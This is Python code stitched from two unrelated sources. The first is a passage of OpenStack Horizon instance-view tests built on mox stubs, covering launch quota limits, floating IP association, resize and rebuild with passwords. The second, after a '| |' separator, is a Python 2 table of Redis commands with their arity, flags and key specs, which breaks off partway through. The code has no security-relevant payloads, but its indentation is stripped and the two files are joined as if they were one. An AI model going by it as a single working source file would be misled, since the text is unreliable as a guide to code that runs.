cinder.volume_list(IsA(http.HttpRequest)) \
.AndReturn(self.volumes.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).AndReturn([])
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.tenant_absolute_limits(IsA(http.HttpRequest)) \
.AndReturn(self.limits['absolute'])
quotas.tenant_quota_usages(IsA(http.HttpRequest)) \
.AndReturn(quota_usages)
self.mox.ReplayAll()
form_data = {'flavor': flavor.id,
'source_type': 'image_id',
'image_id': image.id,
'availability_zone': avail_zone.zoneName,
'keypair': keypair.name,
'name': server.name,
'customization_script': customization_script,
'project_id': self.tenants.first().id,
'user_id': self.user.id,
'groups': sec_group.name,
'volume_type': 'volume_id',
'volume_id': volume_choice,
'device_name': device_name,
'count': 0}
url = reverse('horizon:project:instances:launch')
res = self.client.post(url, form_data)
self.assertContains(res, "greater than or equal to 1")
@test.create_stubs({api.nova: ('flavor_list', 'server_list',
'tenant_absolute_limits',
'extension_supported',),
api.glance: ('image_list_detailed',),
api.network:
('floating_ip_simple_associate_supported',),
})
def test_launch_button_disabled_when_quota_exceeded(self):
limits = self.limits['absolute']
limits['totalInstancesUsed'] = limits['maxTotalInstances']
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
.MultipleTimes().AndReturn(limits)
api.network.floating_ip_simple_associate_supported(
IsA(http.HttpRequest)).MultipleTimes().AndReturn(True)
self.mox.ReplayAll()
launch = tables.LaunchLink()
url = launch.get_link_url()
classes = list(launch.get_default_classes()) + list(launch.classes)
link_name = "%s (%s)" % (unicode(launch.verbose_name),
"Quota exceeded")
expected_string = "<a href='%s' id='instances__action_launch' " \
"title='%s' class='%s disabled'>%s</a>" \
% (url, link_name, " ".join(classes), link_name)
res = self.client.get(INDEX_URL)
self.assertContains(res, expected_string, html=True,
msg_prefix="The launch button is not disabled")
@test.create_stubs({api.nova: ('flavor_list', 'server_list',
'tenant_absolute_limits',
'extension_supported',),
api.glance: ('image_list_detailed',),
api.network:
('floating_ip_simple_associate_supported',),
})
def test_index_options_after_migrate(self):
server = self.servers.first()
server.status = "VERIFY_RESIZE"
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
.MultipleTimes().AndReturn(self.limits['absolute'])
api.network.floating_ip_simple_associate_supported(
IsA(http.HttpRequest)).MultipleTimes().AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertContains(res, "instances__confirm")
self.assertContains(res, "instances__revert")
@test.create_stubs({api.nova: ('flavor_list',
'keypair_list',
'availability_zone_list',
'tenant_absolute_limits',),
api.network: ('security_group_list',),
cinder: ('volume_snapshot_list',
'volume_list',),
api.neutron: ('network_list',
'profile_list'),
api.glance: ('image_list_detailed',)})
def test_select_default_keypair_if_only_one(self):
keypair = self.keypairs.first()
cinder.volume_list(IsA(http.HttpRequest)) \
.AndReturn(self.volumes.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)) \
.AndReturn(self.volumes.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.neutron.network_list(IsA(http.HttpRequest),
tenant_id=self.tenant.id,
shared=False) \
.AndReturn(self.networks.list()[:1])
api.neutron.network_list(IsA(http.HttpRequest),
shared=True) \
.AndReturn(self.networks.list()[1:])
# TODO(absubram): Remove if clause and create separate
# test stubs for when profile_support is being used.
# Additionally ensure those are always run even in default setting
if api.neutron.is_port_profiles_supported():
policy_profiles = self.policy_profiles.list()
api.neutron.profile_list(IsA(http.HttpRequest),
'policy').AndReturn(policy_profiles)
api.nova.tenant_absolute_limits(IsA(http.HttpRequest)) \
.AndReturn(self.limits['absolute'])
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.keypair_list(IsA(http.HttpRequest)) \
.AndReturn([keypair])
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.security_groups.list())
api.nova.availability_zone_list(IsA(http.HttpRequest)) \
.AndReturn(self.availability_zones.list())
self.mox.ReplayAll()
url = reverse('horizon:project:instances:launch')
res = self.client.get(url)
self.assertContains(res, "<option selected='selected' value='%(key)s'>"
"%(key)s</option>" % {'key': keypair.name},
html=True,
msg_prefix="The default keypair was not selected.")
@test.create_stubs({api.network: ('floating_ip_target_get_by_instance',
'tenant_floating_ip_allocate',
'floating_ip_associate'),
api.glance: ('image_list_detailed',),
api.nova: ('server_list',
'flavor_list')})
def test_associate_floating_ip(self):
server = self.servers.first()
fip = self.q_floating_ips.first()
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.flavor_list(IgnoreArg()).AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
api.network.floating_ip_target_get_by_instance(
IsA(http.HttpRequest),
server.id).AndReturn(server.id)
api.network.tenant_floating_ip_allocate(
IsA(http.HttpRequest)).AndReturn(fip)
api.network.floating_ip_associate(
IsA(http.HttpRequest), fip.id, server.id)
self.mox.ReplayAll()
formData = {'action': 'instances__associate-simple__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.network: ('floating_ip_target_get_by_instance',
'tenant_floating_ip_list',
'floating_ip_disassociate',
'tenant_floating_ip_release'),
api.glance: ('image_list_detailed',),
api.nova: ('server_list',
'flavor_list')})
def test_disassociate_floating_ip(self):
server = self.servers.first()
fip = self.q_floating_ips.first()
fip.port_id = server.id
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.flavor_list(IgnoreArg()).AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
api.network.floating_ip_target_get_by_instance(
IsA(http.HttpRequest),
server.id).AndReturn(server.id)
api.network.tenant_floating_ip_list(
IsA(http.HttpRequest)).AndReturn([fip])
api.network.floating_ip_disassociate(
IsA(http.HttpRequest), fip.id, server.id)
api.network.tenant_floating_ip_release(
IsA(http.HttpRequest), fip.id)
self.mox.ReplayAll()
formData = {'action': 'instances__disassociate__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_get',
'flavor_list',
'tenant_absolute_limits')})
def test_instance_resize_get(self):
server = self.servers.first()
api.nova.server_get(IsA(http.HttpRequest), server.id) \
.AndReturn(server)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.tenant_absolute_limits(IsA(http.HttpRequest)) \
.AndReturn(self.limits['absolute'])
self.mox.ReplayAll()
url = reverse('horizon:project:instances:resize', args=[server.id])
res = self.client.get(url)
self.assertTemplateUsed(res, views.WorkflowView.template_name)
@test.create_stubs({api.nova: ('server_get',
'flavor_list',)})
def test_instance_resize_get_server_get_exception(self):
server = self.servers.first()
api.nova.server_get(IsA(http.HttpRequest), server.id) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:resize',
args=[server.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_get',
'flavor_list',)})
def test_instance_resize_get_flavor_list_exception(self):
server = self.servers.first()
api.nova.server_get(IsA(http.HttpRequest), server.id) \
.AndReturn(server)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:resize',
args=[server.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
def _instance_resize_post(self, server_id, flavor_id):
formData = {'flavor': flavor_id,
'default_role': 'member'}
url = reverse('horizon:project:instances:resize',
args=[server_id])
return self.client.post(url, formData)
instance_resize_post_stubs = {
api.nova: ('server_get', 'server_resize',
'flavor_list', 'flavor_get')}
@test.create_stubs(instance_resize_post_stubs)
def test_instance_resize_post(self):
server = self.servers.first()
flavor = self.flavors.first()
api.nova.server_get(IsA(http.HttpRequest), server.id) \
.AndReturn(server)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.server_resize(IsA(http.HttpRequest), server.id, flavor.id) \
.AndReturn([])
self.mox.ReplayAll()
res = self._instance_resize_post(server.id, flavor.id)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs(instance_resize_post_stubs)
def test_instance_resize_post_api_exception(self):
server = self.servers.first()
flavor = self.flavors.first()
api.nova.server_get(IsA(http.HttpRequest), server.id) \
.AndReturn(server)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.nova.server_resize(IsA(http.HttpRequest), server.id, flavor.id) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
res = self._instance_resize_post(server.id, flavor.id)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.glance: ('image_list_detailed',)})
def test_rebuild_instance_get(self):
server = self.servers.first()
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
self.mox.ReplayAll()
url = reverse('horizon:project:instances:rebuild', args=[server.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'project/instances/rebuild.html')
def _instance_rebuild_post(self, server_id, image_id,
password=None, confirm_password=None):
form_data = {'instance_id': server_id,
'image': image_id}
if password is not None:
form_data.update(password=password)
if confirm_password is not None:
form_data.update(confirm_password=confirm_password)
url = reverse('horizon:project:instances:rebuild',
args=[server_id])
return self.client.post(url, form_data)
instance_rebuild_post_stubs = {
api.nova: ('server_rebuild',),
api.glance: ('image_list_detailed',)}
@test.create_stubs(instance_rebuild_post_stubs)
def test_rebuild_instance_post_with_password(self):
server = self.servers.first()
image = self.images.first()
password = u'testpass'
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.nova.server_rebuild(IsA(http.HttpRequest),
server.id,
image.id,
password).AndReturn([])
self.mox.ReplayAll()
res = self._instance_rebuild_post(server.id, image.id,
password=password,
confirm_password=password)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs(instance_rebuild_post_stubs)
def test_rebuild_instance_post_with_password_equals_none(self):
server = self.servers.first()
image = self.images.first()
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.nova.server_rebuild(IsA(http.HttpRequest),
server.id,
image.id,
None).AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
res = self._instance_rebuild_post(server.id, image.id,
password=None,
confirm_password=None)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs(instance_rebuild_post_stubs)
def test_rebuild_instance_post_password_do_not_match(self):
server = self.servers.first()
image = self.images.first()
pass1 = u'somepass'
pass2 = u'notsomepass'
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
self.mox.ReplayAll()
res = self._instance_rebuild_post(server.id, image.id,
password=pass1,
confirm_password=pass2)
self.assertContains(res, "Passwords do not match.")
@test.create_stubs(instance_rebuild_post_stubs)
def test_rebuild_instance_post_with_empty_string(self):
server = self.servers.first()
image = self.images.first()
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.nova.server_rebuild(IsA(http.HttpRequest),
server.id,
image.id,
None).AndReturn([])
self.mox.ReplayAll()
res = self._instance_rebuild_post(server.id, image.id,
password=u'',
confirm_password=u'')
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs(instance_rebuild_post_stubs)
def test_rebuild_instance_post_api_exception(self):
server = self.servers.first()
image = self.images.first()
password = u'testpass'
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
api.nova.server_rebuild(IsA(http.HttpRequest),
server.id,
image.id,
password).AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
res = self._instance_rebuild_post(server.id, image.id,
password=password,
confirm_password=password)
self.assertRedirectsNoFollow(res, INDEX_URL)
| |
# flake8: noqa
COMMANDS = {'APPEND': {'arity': 3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'AUTH': {'arity': 2L,
'flags': ['readonly', 'noscript', 'loading', 'stale', 'fast'],
'key_spec': (0, 0, 0)},
'BGREWRITEAOF': {'arity': 1L,
'flags': ['readonly', 'admin'],
'key_spec': (0, 0, 0)},
'BGSAVE': {'arity': 1L,
'flags': ['readonly', 'admin'],
'key_spec': (0, 0, 0)},
'BITCOUNT': {'arity': -2L,
'flags': ['readonly'],
'key_spec': (1, 1, 1)},
'BITOP': {'arity': -4L,
'flags': ['write', 'denyoom'],
'key_spec': (2, -1, 1)},
'BITPOS': {'arity': -3L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'BLPOP': {'arity': -3L,
'flags': ['write', 'noscript'],
'key_spec': (1, -2, 1)},
'BRPOP': {'arity': -3L,
'flags': ['write', 'noscript'],
'key_spec': (1, 1, 1)},
'BRPOPLPUSH': {'arity': 4L,
'flags': ['write', 'denyoom', 'noscript'],
'key_spec': (1, 2, 1)},
'CLIENT': {'arity': -2L,
'flags': ['readonly', 'admin'],
'key_spec': (0, 0, 0)},
'COMMAND': {'arity': 0L,
'flags': ['readonly', 'loading', 'stale'],
'key_spec': (0, 0, 0)},
'CONFIG': {'arity': -2L,
'flags': ['readonly', 'admin', 'stale'],
'key_spec': (0, 0, 0)},
'DBSIZE': {'arity': 1L,
'flags': ['readonly', 'fast'],
'key_spec': (0, 0, 0)},
'DEBUG': {'arity': -2L,
'flags': ['admin', 'noscript'],
'key_spec': (0, 0, 0)},
'DECR': {'arity': 2L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'DECRBY': {'arity': 3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'DEL': {'arity': -2L, 'flags': ['write'], 'key_spec': (1, -1, 1)},
'DISCARD': {'arity': 1L,
'flags': ['readonly', 'noscript', 'fast'],
'key_spec': (0, 0, 0)},
'DUMP': {'arity': 2L,
'flags': ['readonly', 'admin'],
'key_spec': (1, 1, 1)},
'ECHO': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (0, 0, 0)},
'EVAL': {'arity': -3L,
'flags': ['noscript', 'movablekeys'],
'key_spec': (0, 0, 0)},
'EVALSHA': {'arity': -3L,
'flags': ['noscript', 'movablekeys'],
'key_spec': (0, 0, 0)},
'EXEC': {'arity': 1L,
'flags': ['noscript', 'skip_monitor'],
'key_spec': (0, 0, 0)},
'EXISTS': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'EXPIRE': {'arity': 3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'EXPIREAT': {'arity': 3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'FLUSHALL': {'arity': 1L, 'flags': ['write'], 'key_spec': (0, 0, 0)},
'FLUSHDB': {'arity': 1L, 'flags': ['write'], 'key_spec': (0, 0, 0)},
'GET': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'GETBIT': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'GETRANGE': {'arity': 4L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'GETSET': {'arity': 3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'HDEL': {'arity': -3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'HEXISTS': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'HGET': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'HGETALL': {'arity': 2L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'HINCRBY': {'arity': 4L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'HINCRBYFLOAT': {'arity': 4L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'HKEYS': {'arity': 2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (1, 1, 1)},
'HLEN': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'HMGET': {'arity': -3L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'HMSET': {'arity': -4L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'HSCAN': {'arity': -3L,
'flags': ['readonly', 'random'],
'key_spec': (1, 1, 1)},
'HSET': {'arity': 4L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'HSETNX': {'arity': 4L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'HVALS': {'arity': 2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (1, 1, 1)},
'INCR': {'arity': 2L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'INCRBY': {'arity': 3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'INCRBYFLOAT': {'arity': 3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'INFO': {'arity': -1L,
'flags': ['readonly', 'loading', 'stale'],
'key_spec': (0, 0, 0)},
'KEYS': {'arity': 2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (0, 0, 0)},
'LASTSAVE': {'arity': 1L,
'flags': ['readonly', 'random', 'fast'],
'key_spec': (0, 0, 0)},
'LATENCY': {'arity': -2L,
'flags': ['readonly',
'admin',
'noscript',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'LINDEX': {'arity': 3L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'LINSERT': {'arity': 5L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'LLEN': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'LPOP': {'arity': 2L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'LPUSH': {'arity': -3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'LPUSHX': {'arity': 3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'LRANGE': {'arity': 4L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'LREM': {'arity': 4L, 'flags': ['write'], 'key_spec': (1, 1, 1)},
'LSET': {'arity': 4L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'LTRIM': {'arity': 4L, 'flags': ['write'], 'key_spec': (1, 1, 1)},
'MGET': {'arity': -2L, 'flags': ['readonly'], 'key_spec': (1, -1, 1)},
'MIGRATE': {'arity': 6L,
'flags': ['write', 'admin'],
'key_spec': (0, 0, 0)},
'MONITOR': {'arity': 1L,
'flags': ['readonly', 'admin', 'noscript'],
'key_spec': (0, 0, 0)},
'MOVE': {'arity': 3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'MSET': {'arity': -3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, -1, 2)},
'MSETNX': {'arity': -3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, -1, 2)},
'MULTI': {'arity': 1L,
'flags': ['readonly', 'noscript', 'fast'],
'key_spec': (0, 0, 0)},
'OBJECT': {'arity': 3L, 'flags': ['readonly'], 'key_spec': (2, 2, 2)},
'PERSIST': {'arity': 2L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'PEXPIRE': {'arity': 3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'PEXPIREAT': {'arity': 3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'PFADD': {'arity': -2L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'PFCOUNT': {'arity': -2L, 'flags': ['write'], 'key_spec': (1, 1, 1)},
'PFDEBUG': {'arity': -3L, 'flags': ['write'], 'key_spec': (0, 0, 0)},
'PFMERGE': {'arity': -2L,
'flags': ['write', 'denyoom'],
'key_spec': (1, -1, 1)},
'PFSELFTEST': {'arity': 1L,
'flags': ['readonly'],
'key_spec': (0, 0, 0)},
'PING': {'arity': 1L,
'flags': ['readonly', 'stale', 'fast'],
'key_spec': (0, 0, 0)},
'PSETEX': {'arity': 4L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'PSUBSCRIBE': {'arity': -2L,
'flags': ['readonly',
'pubsub',
'noscript',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'PSYNC': {'arity': 3L,
'flags': ['readonly', 'admin', 'noscript'],
'key_spec': (0, 0, 0)},
'PTTL': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'PUBLISH': {'arity': 3L,
'flags': ['readonly',
'pubsub',
'loading',
'stale',
'fast'],
'key_spec': (0, 0, 0)},
'PUBSUB': {'arity': -2L,
'flags': ['readonly',
'pubsub',
'random',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'PUNSUBSCRIBE': {'arity': -1L,
'flags': ['readonly',
'pubsub',
'noscript',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'RANDOMKEY': {'arity': 1L,
'flags': ['readonly', 'random'],
'key_spec': (0, 0, 0)},
'RENAME': {'arity': 3L, 'flags': ['write'], 'key_spec': (1, 2, 1)},
'RENAMENX': {'arity': 3L,
'flags': ['write', 'fast'],
'key_spec': (1, 2, 1)},
'REPLCONF': {'arity': -1L,
'flags': ['readonly',
'admin',
'noscript',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'RESTORE': {'arity': 4L,
'flags': ['write', 'denyoom', 'admin'],
'key_spec': (1, 1, 1)},
'ROLE': {'arity': 1L,
'flags': ['admin', 'noscript', 'loading', 'stale'],
'key_spec': (0, 0, 0)},
'RPOP': {'arity': 2L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'RPOPLPUSH': {'arity': 3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 2, 1)},
'RPUSH': {'arity': -3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'RPUSHX': {'arity': 3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'SADD': {'arity': -3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'SAVE': {'arity': 1L,
'flags': ['readonly', 'admin', 'noscript'],
'key_spec': (0, 0, 0)},
'SCAN': {'arity': -2L,
'flags': ['readonly', 'random'],
'key_spec': (0, 0, 0)},
'SCARD': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'SCRIPT': {'arity': -2L,
'flags': ['readonly', 'admin', 'noscript'],
'key_spec': (0, 0, 0)},
'SDIFF': {'arity': -2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (1, -1, 1)},
'SDIFFSTORE': {'arity': -3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, -1, 1)},
'SELECT': {'arity': 2L,
'flags': ['readonly', 'loading', 'fast'],
'key_spec': (0, 0, 0)},
'SET': {'arity': -3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'SETBIT': {'arity': 4L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'SETEX': {'arity': 4L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'SETNX': {'arity': 3L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'SETRANGE': {'arity': 4L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'SHUTDOWN': {'arity': -1L,
'flags': ['readonly', 'admin', 'loading', 'stale'],
'key_spec': (0, 0, 0)},
'SINTER': {'arity': -2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (1, -1, 1)},
'SINTERSTORE': {'arity': -3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, -1, 1)},
'SISMEMBER': {'arity': 3L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'SLAVEOF': {'arity': 3L,
'flags': ['admin', 'noscript', 'stale'],
'key_spec': (0, 0, 0)},
'SLOWLOG': {'arity': -2L, 'flags': ['readonly'], 'key_spec': (0, 0, 0)},
'SMEMBERS': {'arity': 2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (1, 1, 1)},
'SMOVE': {'arity': 4L,
'flags': ['write', 'fast'],
'key_spec': (1, 2, 1)},
'SORT': {'arity': -2L,
'flags': ['write', 'denyoom'],
'key_spec': (1, 1, 1)},
'SPOP': {'arity': 2L,
'flags': ['write', 'noscript', 'random', 'fast'],
'key_spec': (1, 1, 1)},
'SRANDMEMBER': {'arity': -2L,
'flags': ['readonly', 'random'],
'key_spec': (1, 1, 1)},
'SREM': {'arity': -3L,
'flags': ['write', 'fast'],
'key_spec': (1, 1, 1)},
'SSCAN': {'arity': -3L,
'flags': ['readonly', 'random'],
'key_spec': (1, 1, 1)},
'STRLEN': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'SUBSCRIBE': {'arity': -2L,
'flags': ['readonly',
'pubsub',
'noscript',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'SUBSTR': {'arity': 4L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'SUNION': {'arity': -2L,
'flags': ['readonly', 'sort_for_script'],
'key_spec': (1, -1, 1)},
'SUNIONSTORE': {'arity': -3L,
'flags': ['write', 'denyoom'],
'key_spec': (1, -1, 1)},
'SYNC': {'arity': 1L,
'flags': ['readonly', 'admin', 'noscript'],
'key_spec': (0, 0, 0)},
'TIME': {'arity': 1L,
'flags': ['readonly', 'random', 'fast'],
'key_spec': (0, 0, 0)},
'TTL': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'TYPE': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'UNSUBSCRIBE': {'arity': -1L,
'flags': ['readonly',
'pubsub',
'noscript',
'loading',
'stale'],
'key_spec': (0, 0, 0)},
'UNWATCH': {'arity': 1L,
'flags': ['readonly', 'noscript', 'fast'],
'key_spec': (0, 0, 0)},
'WATCH': {'arity': -2L,
'flags': ['readonly', 'noscript', 'fast'],
'key_spec': (1, -1, 1)},
'ZADD': {'arity': -4L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'ZCARD': {'arity': 2L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'ZCOUNT': {'arity': 4L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'ZINCRBY': {'arity': 4L,
'flags': ['write', 'denyoom', 'fast'],
'key_spec': (1, 1, 1)},
'ZINTERSTORE': {'arity': -4L,
'flags': ['write', 'denyoom', 'movablekeys'],
'key_spec': (0, 0, 0)},
'ZLEXCOUNT': {'arity': 4L,
'flags': ['readonly', 'fast'],
'key_spec': (1, 1, 1)},
'ZRANGE': {'arity': -4L, 'flags': ['readonly'], 'key_spec': (1, 1, 1)},
'ZRANGEBYLEX': {'arity': -4L,
'flags': ['readonly'],
'key_spec': (1, 1, 1)},
